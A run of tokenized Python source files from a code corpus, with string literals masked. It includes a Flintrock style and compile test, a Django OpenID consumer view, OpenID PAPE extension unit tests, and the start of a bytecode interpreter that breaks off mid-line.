] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> call = ElementTree . tostring ( call , method = '<STR_LIT>' ) <EOL> self . assertEqual ( call , xml ) </s>
<s> import compileall <EOL> import os <EOL> import pep8 <EOL> import yaml <EOL> FLINTROCK_ROOT_DIR = ( <EOL> os . path . dirname ( <EOL> os . path . dirname ( <EOL> os . path . realpath ( __file__ ) ) ) ) <EOL> TEST_TARGETS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> TEST_PATHS = [ <EOL> os . path . join ( FLINTROCK_ROOT_DIR , path ) for path in TEST_TARGETS ] <EOL> def test_code_compiles ( ) : <EOL> for path in TEST_PATHS : <EOL> if os . path . isdir ( path ) : <EOL> result = compileall . compile_dir ( path ) <EOL> else : <EOL> result = compileall . compile_file ( path ) <EOL> assert result == <NUM_LIT:1> <EOL> def test_pep8_compliance ( ) : <EOL> style = pep8 . StyleGuide ( <EOL> config_file = os . path . join ( FLINTROCK_ROOT_DIR , '<STR_LIT>' ) ) <EOL> result = style . check_files ( TEST_PATHS ) <EOL> assert result . total_errors == <NUM_LIT:0> <EOL> def test_config_template_is_valid ( ) : <EOL> config_template = os . path . join ( FLINTROCK_ROOT_DIR , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( config_template ) as f : <EOL> yaml . safe_load ( f ) </s>
<s> from django import http <EOL> from django . http import HttpResponseRedirect <EOL> from django . views . generic . base import TemplateView <EOL> from openid . consumer import consumer <EOL> from openid . consumer . discover import DiscoveryFailure <EOL> from openid . extensions import ax , pape , sreg <EOL> from openid . yadis . constants import YADIS_HEADER_NAME , YADIS_CONTENT_TYPE <EOL> from openid . server . trustroot import RP_RETURN_TO_URL_TYPE <EOL> from djopenid import util <EOL> PAPE_POLICIES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> POLICY_PAIRS = [ ( p , getattr ( pape , p ) ) <EOL> for p in PAPE_POLICIES ] <EOL> def getOpenIDStore ( ) : <EOL> """<STR_LIT>""" <EOL> return util . getOpenIDStore ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def getConsumer ( request ) : <EOL> """<STR_LIT>""" <EOL> return consumer . Consumer ( request . session , getOpenIDStore ( ) ) <EOL> def renderIndexPage ( request , ** template_args ) : <EOL> template_args [ '<STR_LIT>' ] = util . getViewURL ( request , startOpenID ) <EOL> template_args [ '<STR_LIT>' ] = POLICY_PAIRS <EOL> response = TemplateView ( <EOL> request , '<STR_LIT>' , template_args ) <EOL> response [ YADIS_HEADER_NAME ] = util . getViewURL ( request , rpXRDS ) <EOL> return response <EOL> def startOpenID ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . POST : <EOL> openid_url = request . POST [ '<STR_LIT>' ] <EOL> c = getConsumer ( request ) <EOL> error = None <EOL> try : <EOL> auth_request = c . begin ( openid_url ) <EOL> except DiscoveryFailure as e : <EOL> error = "<STR_LIT>" % ( str ( e ) , ) <EOL> if error : <EOL> return renderIndexPage ( request , error = error ) <EOL> sreg_request = sreg . SRegRequest ( optional = [ '<STR_LIT:email>' , '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT>' ] ) <EOL> auth_request . addExtension ( sreg_request ) <EOL> ax_request = ax . FetchRequest ( ) <EOL> ax_request . add ( <EOL> ax . AttrInfo ( '<STR_LIT>' , <EOL> required = True ) ) <EOL> ax_request . add ( <EOL> ax . AttrInfo ( '<STR_LIT>' , <EOL> required = False , count = ax . UNLIMITED_VALUES ) ) <EOL> auth_request . addExtension ( ax_request ) <EOL> requested_policies = [ ] <EOL> policy_prefix = '<STR_LIT>' <EOL> for k , v in request . POST . items ( ) : <EOL> if k . startswith ( policy_prefix ) : <EOL> policy_attr = k [ len ( policy_prefix ) : ] <EOL> if policy_attr in PAPE_POLICIES : <EOL> requested_policies . append ( getattr ( pape , policy_attr ) ) <EOL> if requested_policies : <EOL> pape_request = pape . Request ( requested_policies ) <EOL> auth_request . addExtension ( pape_request ) <EOL> trust_root = util . getViewURL ( request , startOpenID ) <EOL> return_to = util . getViewURL ( request , finishOpenID ) <EOL> if auth_request . shouldSendRedirect ( ) : <EOL> url = auth_request . redirectURL ( trust_root , return_to ) <EOL> return HttpResponseRedirect ( url ) <EOL> else : <EOL> form_id = '<STR_LIT>' <EOL> form_html = auth_request . formMarkup ( trust_root , return_to , <EOL> False , { '<STR_LIT:id>' : form_id } ) <EOL> return TemplateView ( <EOL> request , '<STR_LIT>' , { '<STR_LIT:html>' : form_html } ) <EOL> return renderIndexPage ( request ) <EOL> def finishOpenID ( request ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> request_args = util . normalDict ( request . GET ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> request_args . update ( util . normalDict ( request . POST ) ) <EOL> if request_args : <EOL> c = getConsumer ( request ) <EOL> return_to = util . getViewURL ( request , finishOpenID ) <EOL> response = c . complete ( request_args , return_to ) <EOL> sreg_response = { } <EOL> ax_items = { } <EOL> if response . status == consumer . SUCCESS : <EOL> sreg_response = sreg . SRegResponse . fromSuccessResponse ( response ) <EOL> ax_response = ax . FetchResponse . fromSuccessResponse ( response ) <EOL> if ax_response : <EOL> ax_items = { <EOL> '<STR_LIT>' : ax_response . get ( <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ax_response . get ( <EOL> '<STR_LIT>' ) , <EOL> } <EOL> pape_response = None <EOL> if response . status == consumer . SUCCESS : <EOL> pape_response = pape . Response . fromSuccessResponse ( response ) <EOL> if not pape_response . auth_policies : <EOL> pape_response = None <EOL> results = { <EOL> consumer . CANCEL : <EOL> { '<STR_LIT:message>' : '<STR_LIT>' } , <EOL> consumer . FAILURE : <EOL> { '<STR_LIT:error>' : '<STR_LIT>' } , <EOL> consumer . SUCCESS : <EOL> { '<STR_LIT:url>' : response . getDisplayIdentifier ( ) , <EOL> '<STR_LIT>' : sreg_response and list ( sreg_response . items ( ) ) , <EOL> '<STR_LIT>' : list ( ax_items . items ( ) ) , <EOL> '<STR_LIT>' : pape_response } <EOL> } <EOL> result = results [ response . status ] <EOL> if isinstance ( response , consumer . FailureResponse ) : <EOL> result [ '<STR_LIT>' ] = response . message <EOL> return renderIndexPage ( request , ** result ) <EOL> def rpXRDS ( request ) : <EOL> """<STR_LIT>""" <EOL> return util . renderXRDS ( <EOL> request , <EOL> [ RP_RETURN_TO_URL_TYPE ] , <EOL> [ util . getViewURL ( request , finishOpenID ) ] ) </s>
<s> from openid . extensions . draft import pape5 as pape <EOL> from openid . message import * <EOL> from openid . server import server <EOL> import warnings <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , module = __name__ , <EOL> message = '<STR_LIT>' ) <EOL> import unittest <EOL> class PapeRequestTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . req = pape . Request ( ) <EOL> def test_construct ( self ) : <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_policies ) <EOL> self . assertEqual ( None , self . req . max_auth_age ) <EOL> self . assertEqual ( '<STR_LIT>' , self . req . ns_alias ) <EOL> self . assertFalse ( self . req . preferred_auth_level_types ) <EOL> bogus_levels = [ '<STR_LIT>' ] <EOL> req2 = pape . Request ( <EOL> [ pape . AUTH_MULTI_FACTOR ] , <NUM_LIT:1000> , bogus_levels ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> req2 . preferred_auth_policies ) <EOL> self . assertEqual ( <NUM_LIT:1000> , req2 . max_auth_age ) <EOL> self . assertEqual ( bogus_levels , req2 . preferred_auth_level_types ) <EOL> def test_addAuthLevel ( self ) : <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . req . auth_level_aliases [ '<STR_LIT>' ] ) <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . assertRaises ( KeyError , <EOL> self . req . addAuthLevel , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> uri = '<STR_LIT>' <EOL> self . req . addAuthLevel ( uri ) <EOL> self . assertTrue ( uri in list ( self . req . auth_level_aliases . values ( ) ) ) <EOL> before_aliases = list ( self . req . auth_level_aliases . keys ( ) ) <EOL> self . req . addAuthLevel ( uri ) <EOL> after_aliases = list ( self . req . auth_level_aliases . keys ( ) ) <EOL> self . assertEqual ( before_aliases , after_aliases ) <EOL> def test_add_policy_uri ( self ) : <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_PHISHING_RESISTANT ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . req . preferred_auth_policies ) <EOL> def test_getExtensionArgs ( self ) : <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> self . req . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> self . req . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> self . req . max_auth_age = <NUM_LIT> <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> def test_getExtensionArgsWithAuthLevels ( self ) : <EOL> uri = '<STR_LIT>' <EOL> alias = '<STR_LIT>' <EOL> self . req . addAuthLevel ( uri , alias ) <EOL> uri2 = '<STR_LIT>' <EOL> alias2 = '<STR_LIT>' <EOL> self . req . addAuthLevel ( uri2 , alias2 ) <EOL> expected_args = { <EOL> ( '<STR_LIT>' % alias ) : uri , <EOL> ( '<STR_LIT>' % alias2 ) : uri2 , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( [ alias , alias2 ] ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertEqual ( expected_args , self . req . getExtensionArgs ( ) ) <EOL> def test_parseExtensionArgsWithAuthLevels ( self ) : <EOL> uri = '<STR_LIT>' <EOL> alias = '<STR_LIT>' <EOL> uri2 = '<STR_LIT>' <EOL> alias2 = '<STR_LIT>' <EOL> request_args = { <EOL> ( '<STR_LIT>' % alias ) : uri , <EOL> ( '<STR_LIT>' % alias2 ) : uri2 , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( [ alias , alias2 ] ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . req . parseExtensionArgs ( request_args , is_openid1 = False , strict = False ) <EOL> expected_auth_levels = [ uri , uri2 ] <EOL> self . assertEqual ( expected_auth_levels , <EOL> self . req . preferred_auth_level_types ) <EOL> self . assertEqual ( uri , self . req . auth_level_aliases [ alias ] ) <EOL> self . assertEqual ( uri2 , self . req . auth_level_aliases [ alias2 ] ) <EOL> def test_parseExtensionArgsWithAuthLevels_openID1 ( self ) : <EOL> request_args = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> expected_auth_levels = [ pape . LEVELS_NIST , pape . LEVELS_JISA ] <EOL> self . req . parseExtensionArgs ( request_args , is_openid1 = True ) <EOL> self . assertEqual ( expected_auth_levels , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req = pape . Request ( ) <EOL> self . req . parseExtensionArgs ( request_args , is_openid1 = False ) <EOL> self . assertEqual ( [ ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req = pape . Request ( ) <EOL> self . assertRaises ( ValueError , <EOL> self . req . parseExtensionArgs , <EOL> request_args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_ignoreBadAuthLevels ( self ) : <EOL> request_args = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . req . parseExtensionArgs ( request_args , False ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_level_types ) <EOL> def test_parseExtensionArgs_strictBadAuthLevels ( self ) : <EOL> request_args = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertRaises ( ValueError , self . req . parseExtensionArgs , <EOL> request_args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . req . parseExtensionArgs ( args , False ) <EOL> self . assertEqual ( <NUM_LIT:9> , self . req . max_auth_age ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_level_types ) <EOL> def test_parseExtensionArgs_strict_bad_auth_age ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertRaises ( ValueError , self . req . parseExtensionArgs , args , <EOL> is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_empty ( self ) : <EOL> self . req . parseExtensionArgs ( { } , False ) <EOL> self . assertEqual ( None , self . req . max_auth_age ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_policies ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_level_types ) <EOL> def test_fromOpenIDRequest ( self ) : <EOL> policy_uris = [ pape . AUTH_MULTI_FACTOR , pape . AUTH_PHISHING_RESISTANT ] <EOL> openid_req_msg = Message . fromOpenIDArgs ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : OPENID2_NS , <EOL> '<STR_LIT>' : pape . ns_uri , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> oid_req = server . OpenIDRequest ( ) <EOL> oid_req . message = openid_req_msg <EOL> req = pape . Request . fromOpenIDRequest ( oid_req ) <EOL> self . assertEqual ( policy_uris , req . preferred_auth_policies ) <EOL> self . assertEqual ( <NUM_LIT> , req . max_auth_age ) <EOL> def test_fromOpenIDRequest_no_pape ( self ) : <EOL> message = Message ( ) <EOL> openid_req = server . OpenIDRequest ( ) <EOL> openid_req . message = message <EOL> pape_req = pape . Request . fromOpenIDRequest ( openid_req ) <EOL> assert ( pape_req is None ) <EOL> def test_preferred_types ( self ) : <EOL> self . req . addPolicyURI ( pape . AUTH_PHISHING_RESISTANT ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> pt = self . req . preferredTypes ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_MULTI_FACTOR_PHYSICAL ] ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , pt ) <EOL> class DummySuccessResponse : <EOL> def __init__ ( self , message , signed_stuff ) : <EOL> self . message = message <EOL> self . signed_stuff = signed_stuff <EOL> def isOpenID1 ( self ) : <EOL> return False <EOL> def getSignedNS ( self , ns_uri ) : <EOL> return self . signed_stuff <EOL> class PapeResponseTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . resp = pape . Response ( ) <EOL> def test_construct ( self ) : <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> self . assertEqual ( None , self . resp . auth_time ) <EOL> self . assertEqual ( '<STR_LIT>' , self . resp . ns_alias ) <EOL> self . assertEqual ( None , self . resp . nist_auth_level ) <EOL> req2 = pape . Response ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> "<STR_LIT>" , { pape . LEVELS_NIST : <NUM_LIT:3> } ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , req2 . auth_policies ) <EOL> self . assertEqual ( "<STR_LIT>" , req2 . auth_time ) <EOL> self . assertEqual ( <NUM_LIT:3> , req2 . nist_auth_level ) <EOL> def test_add_policy_uri ( self ) : <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_PHISHING_RESISTANT ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . resp . auth_policies ) <EOL> self . assertRaises ( RuntimeError , self . resp . addPolicyURI , <EOL> pape . AUTH_NONE ) <EOL> def test_getExtensionArgs ( self ) : <EOL> self . assertEqual ( { '<STR_LIT>' : pape . AUTH_NONE } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . auth_time = "<STR_LIT>" <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . setAuthLevel ( pape . LEVELS_NIST , '<STR_LIT:3>' ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : pape . LEVELS_NIST } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> def test_getExtensionArgs_error_auth_age ( self ) : <EOL> self . resp . auth_time = "<STR_LIT>" <EOL> self . assertRaises ( ValueError , self . resp . getExtensionArgs ) <EOL> def test_parseExtensionArgs ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( '<STR_LIT>' , self . resp . auth_time ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_valid_none ( self ) : <EOL> args = { '<STR_LIT>' : pape . AUTH_NONE } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_old_none ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT:none>' } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_old_none_strict ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT:none>' } <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . resp . parseExtensionArgs , args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_empty ( self ) : <EOL> self . resp . parseExtensionArgs ( { } , is_openid1 = False ) <EOL> self . assertEqual ( None , self . resp . auth_time ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_empty_strict ( self ) : <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . resp . parseExtensionArgs , { } , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_ignore_superfluous_none ( self ) : <EOL> policies = [ pape . AUTH_NONE , pape . AUTH_MULTI_FACTOR_PHYSICAL ] <EOL> args = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policies ) , <EOL> } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False , strict = False ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR_PHYSICAL ] , <EOL> self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_none_strict ( self ) : <EOL> policies = [ pape . AUTH_NONE , pape . AUTH_MULTI_FACTOR_PHYSICAL ] <EOL> args = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policies ) , <EOL> } <EOL> self . assertRaises ( ValueError , self . resp . parseExtensionArgs , <EOL> args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_strict_bogus1 ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertRaises ( ValueError , self . resp . parseExtensionArgs , <EOL> args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_openid1_strict ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : pape . AUTH_NONE , <EOL> } <EOL> self . resp . parseExtensionArgs ( args , strict = True , is_openid1 = True ) <EOL> self . assertEqual ( '<STR_LIT:0>' , self . resp . getAuthLevel ( pape . LEVELS_NIST ) ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_strict_no_namespace_decl_openid2 ( self ) : <EOL> args = { '<STR_LIT>' : pape . AUTH_NONE , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> self . assertRaises ( ValueError , self . resp . parseExtensionArgs , <EOL> args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_nostrict_no_namespace_decl_openid2 ( self ) : <EOL> args = { '<STR_LIT>' : pape . AUTH_NONE , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False , strict = False ) <EOL> self . assertRaises ( KeyError , self . resp . getAuthLevel , <EOL> pape . LEVELS_NIST ) <EOL> def test_parseExtensionArgs_strict_good ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : pape . LEVELS_NIST } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False , strict = True ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . resp . auth_policies ) <EOL> self . assertEqual ( '<STR_LIT>' , self . resp . auth_time ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . resp . nist_auth_level ) <EOL> def test_parseExtensionArgs_nostrict_bogus ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . resp . auth_policies ) <EOL> self . assertEqual ( None , self . resp . auth_time ) <EOL> self . assertEqual ( None , self . resp . nist_auth_level ) <EOL> def test_fromSuccessResponse ( self ) : <EOL> policy_uris = [ pape . AUTH_MULTI_FACTOR , pape . AUTH_PHISHING_RESISTANT ] <EOL> openid_req_msg = Message . fromOpenIDArgs ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : OPENID2_NS , <EOL> '<STR_LIT>' : pape . ns_uri , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> signed_stuff = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> oid_req = DummySuccessResponse ( openid_req_msg , signed_stuff ) <EOL> req = pape . Response . fromSuccessResponse ( oid_req ) <EOL> self . assertEqual ( policy_uris , req . auth_policies ) <EOL> self . assertEqual ( '<STR_LIT>' , req . auth_time ) <EOL> def test_fromSuccessResponseNoSignedArgs ( self ) : <EOL> policy_uris = [ pape . AUTH_MULTI_FACTOR , pape . AUTH_PHISHING_RESISTANT ] <EOL> openid_req_msg = Message . fromOpenIDArgs ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : OPENID2_NS , <EOL> '<STR_LIT>' : pape . ns_uri , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> signed_stuff = { } <EOL> class NoSigningDummyResponse ( DummySuccessResponse ) : <EOL> def getSignedNS ( self , ns_uri ) : <EOL> return None <EOL> oid_req = NoSigningDummyResponse ( openid_req_msg , signed_stuff ) <EOL> resp = pape . Response . fromSuccessResponse ( oid_req ) <EOL> self . assertTrue ( resp is None ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> import dis <EOL> import inspect <EOL> import linecache <EOL> import logging <EOL> import operator <EOL> import sys <EOL> import six <EOL> from six . moves import reprlib <EOL> PY3 , PY2 = six . PY3 , not six . PY3 <EOL> from . pyobj import Frame , Block , Method , Function , Generator <EOL> log = logging . getLogger ( __name__ ) <EOL> if six . PY3 : <EOL> byteint = lambda b : b <EOL> else : <EOL> byteint = ord <EOL> repr_obj = reprlib . Repr ( ) <EOL> repr_obj . maxother = <NUM_LIT> <EOL> repper = repr_obj . repr <EOL> class VirtualMachineError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class VirtualMachine ( object ) : <EOL> def __init__ ( self ) : <EOL> self . frames = [ ] <EOL> self . frame = None <EOL> self . return_value = None <EOL> self . last_exception = None <EOL> def top ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . frame . stack [ - <NUM_LIT:1> ] <EOL> def pop ( self , i = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return self . frame . stack . pop ( - <NUM_LIT:1> - i ) <EOL> def push ( self , * vals ) : <EOL> """<STR_LIT>""" <EOL> self . frame . stack . extend ( vals ) <EOL> def popn ( self , n ) : <EOL> """<STR_LIT>""" <EOL> if n : <EOL> ret = self . frame . stack [ - n : ] <EOL> self . frame . stack [ - n : ] = [ ] <EOL> return ret <EOL> else : <EOL> return [ ] <EOL> def peek ( self , n ) : <EOL> """<STR_LIT>""" <EOL> return self . frame . stack [ - n ] <EOL> def jump ( self , jump ) : <EOL> """<STR_LIT>""" <EOL> self . frame . f_lasti = jump <EOL> def push_block ( self , type , handler = None , level = None ) : <EOL> if level is None : <EOL> level = len ( self . frame . stack ) <EOL> self . frame . block_stack . append ( Block ( type , handler , level ) ) <EOL> def pop_block ( self ) : <EOL> return self . frame . block_stack . pop ( ) <EOL> def make_frame ( self , code , callargs = { } , f_globals = None , f_locals = None ) : <EOL> log . info ( "<STR_LIT>" % ( code , repper ( callargs ) ) ) <EOL> if f_globals is not None : <EOL> f_globals = f_globals <EOL> if f_locals is None : <EOL> f_locals = f_globals <EOL> elif self . frames : <EOL> f_globals = self . frame . f_globals <EOL> f_locals = { } <EOL> else : <EOL> f_globals = f_locals = { <EOL> '<STR_LIT>' : __builtins__ , <EOL> '<STR_LIT>' : '<STR_LIT:__main__>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> f_locals . update ( callargs ) <EOL> frame = Frame ( code , f_globals , f_locals , self . frame ) <EOL> return frame <EOL> def push_frame ( self , frame ) : <EOL> self . frames . append ( frame ) <EOL> self . frame = frame <EOL> def pop_frame ( self ) : <EOL> self . frames . pop ( ) <EOL> if self . frames : <EOL> self . frame = self . frames [ - <NUM_LIT:1> ] <EOL> else : <EOL> self . frame = None <EOL> def print_frames ( self ) : <EOL> """<STR_LIT>""" <EOL> for f in self . frames : <EOL> filename = f . f_code . co_filename <EOL> lineno = f . line_number ( ) <EOL> print ( '<STR_LIT>' % ( <EOL> filename , lineno , f . f_code . co_name <EOL> ) ) <EOL> linecache . checkcache ( filename ) <EOL> line = linecache . getline ( filename , lineno , f . f_globals ) <EOL> if line : <EOL> print ( 